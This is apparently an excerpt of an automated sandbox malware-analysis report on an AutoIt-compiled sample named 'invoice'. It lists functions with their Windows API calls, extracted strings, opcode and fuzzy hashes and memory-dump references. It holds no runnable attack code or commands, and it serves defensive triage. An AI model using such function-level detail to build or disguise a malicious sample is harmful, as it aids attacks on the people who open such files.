                        • Instruction ID: cd41e5a8fc8c26c6908b750a88382e034a3c318ad4af8da65b7124bf63d058bc
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: EAC170B2A051A30DDB2D4639C47417EBEA17AA37B271B076DE4B3CB5C4FF20D564A620
                        Function 0152EBE8 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 3f2994733cc451bfd8c414f0bd9cc54a1ca520b53352ae63f55fc89b6174b3a7
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 1941C171D1051CEBCF48CFADC991AAEBBF2EF88201F548299D516AB345D730AB41DB80
                        Function 0152EAD8 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 399552698f791a18522fc6639a674e16a827c952f570dd565e555e31bb1d7c7b
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 25018079A00109EFCB44DF98C5919AEF7B5FB49210F20869AD809AB341D730AE41DB90
                        Function 0152EA78 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 8e436f1119dba3037df6d5ca41a362c38eeff5fb42ad501e139ac5a8d826979b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 03019279A00209EFCB44DF98C5919AEF7F5FB89310F20859AD819AB341D730AE41DB80
                        Function 0152D468 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 00FF791B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00FF7970
                        • DeleteObject.GDI32(00000000), ref: 00FF7982
                        • DestroyWindow.USER32 ref: 00FF7990
                        • GetDesktopWindow.USER32 ref: 00FF79AA
                        • GetWindowRect.USER32(00000000), ref: 00FF79B1
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FF7AF2
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FF7B02
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7B4A
                        • GetClientRect.USER32(00000000,?), ref: 00FF7B56
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FF7B90
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BB2
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BC5
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BD0
                        • GlobalLock.KERNEL32(00000000), ref: 00FF7BD9
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BE8
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF7BF1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BF8
                        • GlobalFree.KERNEL32(00000000), ref: 00FF7C03
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7C15
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01012CAC,00000000), ref: 00FF7C2B
                        • GlobalFree.KERNEL32(00000000), ref: 00FF7C3B
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FF7C61
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FF7C80
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7CA2
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7E8F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 49c184246d5e4ecdae46486b7d9e761fc753bbd81b85b6d82f10205975c260f1
                        • Instruction ID: 0a11fb0823cf2fead78ebe56d914e2f138b01384f1590502c779be5cd81c50ba
                        • Opcode Fuzzy Hash: 49c184246d5e4ecdae46486b7d9e761fc753bbd81b85b6d82f10205975c260f1
                        • Instruction Fuzzy Hash: 12029271900209AFDB25EF64CD89EBEBBB9FF49310F044159F945AB2A0CB799D01DB60
                        Function 010035D4 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,0100F910), ref: 01003690
                        • IsWindowVisible.USER32(?), ref: 010036B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharUpperVisibleWindow
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        • API String ID: 4105515805-45149045
                        • Opcode ID: 5fa61142ec47de4b4d897023dd03059e9394f4cbed0ad2572f7bc2f7491dee1b
                        • Instruction ID: 7fd510df835db31c4179c8d3588332fbb2abb9e64f9197b81f8a3296bcee7f76
                        • Opcode Fuzzy Hash: 5fa61142ec47de4b4d897023dd03059e9394f4cbed0ad2572f7bc2f7491dee1b
                        • Instruction Fuzzy Hash: 77D19E702087018FEA16EF14C891A6E7BA6BF95354F084458F8C65F3E2CF75E94ADB41
                        Function 0100A60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                        Download Yara Rule
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0100A662
                        • GetSysColorBrush.USER32(0000000F), ref: 0100A693
                        • GetSysColor.USER32(0000000F), ref: 0100A69F
                        • SetBkColor.GDI32(?,000000FF), ref: 0100A6B9
                        • SelectObject.GDI32(?,00000000), ref: 0100A6C8
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A6F3
                        • GetSysColor.USER32(00000010), ref: 0100A6FB
                        • CreateSolidBrush.GDI32(00000000), ref: 0100A702
                        • FrameRect.USER32(?,?,00000000), ref: 0100A711
                        • DeleteObject.GDI32(00000000), ref: 0100A718
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0100A763
                        • FillRect.USER32(?,?,00000000), ref: 0100A795
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100A7C0
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(00000012), ref: 0100A935
                          • Part of subcall function 0100A8FC: SetTextColor.GDI32(?,?), ref: 0100A939
                          • Part of subcall function 0100A8FC: GetSysColorBrush.USER32(0000000F), ref: 0100A94F
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(0000000F), ref: 0100A95A
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(00000011), ref: 0100A977
                          • Part of subcall function 0100A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A985
                          • Part of subcall function 0100A8FC: SelectObject.GDI32(?,00000000), ref: 0100A996
                          • Part of subcall function 0100A8FC: SetBkColor.GDI32(?,00000000), ref: 0100A99F
                          • Part of subcall function 0100A8FC: SelectObject.GDI32(?,?), ref: 0100A9AC
                          • Part of subcall function 0100A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 0100A9CB
                          • Part of subcall function 0100A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9E2
                          • Part of subcall function 0100A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9F7
                          • Part of subcall function 0100A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100AA1F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                        • String ID:
                        • API String ID: 3521893082-0
                        • Opcode ID: d10dba0c8a55529fa38d49167a7cea2cc4150ae1fcc972e08849e87baba3eb24
                        • Instruction ID: 928f89eb8f7e2e88691b92ac201e14b61e3c834a5739e3b335ef18dade3dae7a
                        • Opcode Fuzzy Hash: d10dba0c8a55529fa38d49167a7cea2cc4150ae1fcc972e08849e87baba3eb24
                        • Instruction Fuzzy Hash: DF917C72108302EFE7629F64DC08A5B7BE9FF89321F104B19FAA6961D0C736D944DB51
                        Function 00F82C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?), ref: 00F82CA2
                        • DeleteObject.GDI32(00000000), ref: 00F82CE8
                        • DeleteObject.GDI32(00000000), ref: 00F82CF3
                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00F82CFE
                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00F82D09
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FBC5BB
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FBC5F4
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FBCA1D
                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                        • SendMessageW.USER32(?,00001053), ref: 00FBCA5A
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FBCA71
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCA87
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCA92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: 76ca16cde0511eb3c9fc355c4fc49ce9b193a92ee18cb00cdfc52694474b89e1
                        • Instruction ID: 942b2ef6502d9a00ba28ef48afc9dfabaa9f37ed99d3584a21c148f46261294c
                        • Opcode Fuzzy Hash: 76ca16cde0511eb3c9fc355c4fc49ce9b193a92ee18cb00cdfc52694474b89e1
                        • Instruction Fuzzy Hash: 94129C31A00201EFDB21DF25C885BEABBE5BF05321F544569E58ADB252CB35E842EF91
                        Function 00FF75C0 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00FF75F3
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FF76B2
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00FF76F0
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00FF7702
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00FF7748
                        • GetClientRect.USER32(00000000,?), ref: 00FF7754
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00FF7798
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FF77A7
                        • GetStockObject.GDI32(00000011), ref: 00FF77B7
                        • SelectObject.GDI32(00000000,00000000), ref: 00FF77BB
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00FF77CB
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FF77D4
                        • DeleteDC.GDI32(00000000), ref: 00FF77DD
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FF7809
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FF7820
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00FF785B
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FF786F
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FF7880
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00FF78B0
                        • GetStockObject.GDI32(00000011), ref: 00FF78BB
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FF78C6
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00FF78D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 11bc25ce9896a0d2cc0e0ba7d457b878bdf42fdd44a6b757ff6cbf5cdc91cf24
                        • Instruction ID: 265d680b63dc7da8ad10c26ed8d4a12f8affa24d0f25f62fbc42b8d6e05007af
                        • Opcode Fuzzy Hash: 11bc25ce9896a0d2cc0e0ba7d457b878bdf42fdd44a6b757ff6cbf5cdc91cf24
                        • Instruction Fuzzy Hash: ECA171B1A40209BFEB24DBA4DD8AFAEBBA9EF05710F004105FA54E72D0C775AD00DB60
                        Function 00FEAD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEADAA
                        • GetDriveTypeW.KERNEL32(?,0100FAC0,?,\\.\,0100F910), ref: 00FEAE87
                        • SetErrorMode.KERNEL32(00000000,0100FAC0,?,\\.\,0100F910), ref: 00FEAFE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: e10cbeb0538cd30c76edeecd29e7b7701a102496f7036f4d5118aca4ed806a71
                        • Instruction ID: ec526cf254ee0914b4172662d6435d77eeb9402b7980422bc039cc1588ae6694
                        • Opcode Fuzzy Hash: e10cbeb0538cd30c76edeecd29e7b7701a102496f7036f4d5118aca4ed806a71
                        • Instruction Fuzzy Hash: 1B51C7B56486C59BCB14EF13CD82ABDB374AB84710724819AF942AB251C775FD02FB83
                        Function 00F86A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: f3843d23b6ec853a6f3c6a433ef0a808b0aa0da2371543eacd159a88cfbc3fa0
                        • Instruction ID: ba6f4b13cff9064a35ec69e0b8ef7368c5ef1c1fea0e17cdd89395d001962566
                        • Opcode Fuzzy Hash: f3843d23b6ec853a6f3c6a433ef0a808b0aa0da2371543eacd159a88cfbc3fa0
                        • Instruction Fuzzy Hash: 888126B1A00305ABCB25BB62CC82FEB3769AF15B10F144025F945EA192EB68DE51F791
                        Function 0100A8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0100A935
                        • SetTextColor.GDI32(?,?), ref: 0100A939
                        • GetSysColorBrush.USER32(0000000F), ref: 0100A94F
                        • GetSysColor.USER32(0000000F), ref: 0100A95A
                        • CreateSolidBrush.GDI32(?), ref: 0100A95F
                        • GetSysColor.USER32(00000011), ref: 0100A977
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A985
                        • SelectObject.GDI32(?,00000000), ref: 0100A996
                        • SetBkColor.GDI32(?,00000000), ref: 0100A99F
                        • SelectObject.GDI32(?,?), ref: 0100A9AC
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A9CB
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9E2
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9F7
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100AA1F
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0100AA46
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0100AA64
                        • DrawFocusRect.USER32(?,?), ref: 0100AA6F
                        • GetSysColor.USER32(00000011), ref: 0100AA7D
                        • SetTextColor.GDI32(?,00000000), ref: 0100AA85
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0100AA99
                        • SelectObject.GDI32(?,0100A62C), ref: 0100AAB0
                        • DeleteObject.GDI32(?), ref: 0100AABB
                        • SelectObject.GDI32(?,?), ref: 0100AAC1
                        • DeleteObject.GDI32(?), ref: 0100AAC6
                        • SetTextColor.GDI32(?,?), ref: 0100AACC
                        • SetBkColor.GDI32(?,?), ref: 0100AAD6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 209159e4389bd4e76d7cdf4b76d8c737468845e676e0862242b34d0eb47f2f5a
                        • Instruction ID: c0a5c77bfffc0abb29112212c80e209a9d321cee45f8d1985038436cdedfc2e7
                        • Opcode Fuzzy Hash: 209159e4389bd4e76d7cdf4b76d8c737468845e676e0862242b34d0eb47f2f5a
                        • Instruction Fuzzy Hash: 54515D71900209FFEB229FA4DC48EAE7BB9EB09320F114615FA51AB2D1D7769940DF90
                        Function 01008A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01008AF3
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008B04
                        • CharNextW.USER32(0000014E), ref: 01008B33
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01008B74
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01008B8A
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008B9B
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01008BB8
                        • SetWindowTextW.USER32(?,0000014E), ref: 01008C0A
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01008C20
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01008C51
                        • _memset.LIBCMT ref: 01008C76
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01008CBF
                        • _memset.LIBCMT ref: 01008D1E
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01008D48
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 01008DA0
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 01008E4D
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 01008E6F
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008EB9
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008EE6
                        • DrawMenuBar.USER32(?), ref: 01008EF5
                        • SetWindowTextW.USER32(?,0000014E), ref: 01008F1D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: c2618716af0c6c527d0e4ad9388708907d7b967d0f0d41d5fc99feb767b11160
                        • Instruction ID: 0240d2d122b56709a58db6a73fa7df83c4de42225d979ac673b572692e63eb32
                        • Opcode Fuzzy Hash: c2618716af0c6c527d0e4ad9388708907d7b967d0f0d41d5fc99feb767b11160
